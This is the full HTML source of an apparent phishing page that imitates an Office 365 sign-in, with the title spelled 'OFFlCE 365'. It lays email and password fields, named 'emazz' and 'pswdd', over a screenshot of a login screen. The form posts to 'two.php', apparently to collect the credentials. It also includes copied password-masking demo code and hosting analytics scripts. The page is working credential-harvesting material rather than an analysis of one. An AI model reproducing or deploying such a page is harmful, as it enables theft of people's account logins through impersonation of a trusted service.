

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>
<meta name = "viewport" content = "user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
<meta name="apple-mobile-web-app-capable" content="yes" />
<title>OFFlCE 365</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:398px;height:393px;text-align:left;z-index:3;">
<img src="360_files/360.png" id="Image1" alt="" width="391" height="380" " align="top" border="0"></div>

<div id="bvForm1" style="position:absolute;left:0px;top:0px;width:401px;height:400px;z-index:4">
<form name="Formv1" method="post" id="demo-form" action="two.php">
<input type="hidden" name="OFF" value="of">
<input id="email" style="position:absolute;left:19px;top:143px;width:306px;height:22px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:0" name="emazz" value="" type="text" required placeholder="Email">

<input style="position:absolute;left:19px;top:175px;width:306px;height:22px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:1" name="pswdd" value="" type="text" id="demo-field" required placeholder="Password">


<input type="image" src="360_files/w_button.png" style="position:absolute;left:38px;top:271px;">
</form>
</div>
<script type="text/javascript">
 
  //apply masking to the demo-field
  //pass the field reference, masking symbol, and character limit
  new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
 
  //test the submitted value
  document.getElementById('demo-form').onsubmit = function()
  {
   alert('pword = "' + this.pword.value + '"');
   return false;
  };
 
 </script>

</body><script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh'},{'server':'p3plcpnl0778'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script></html>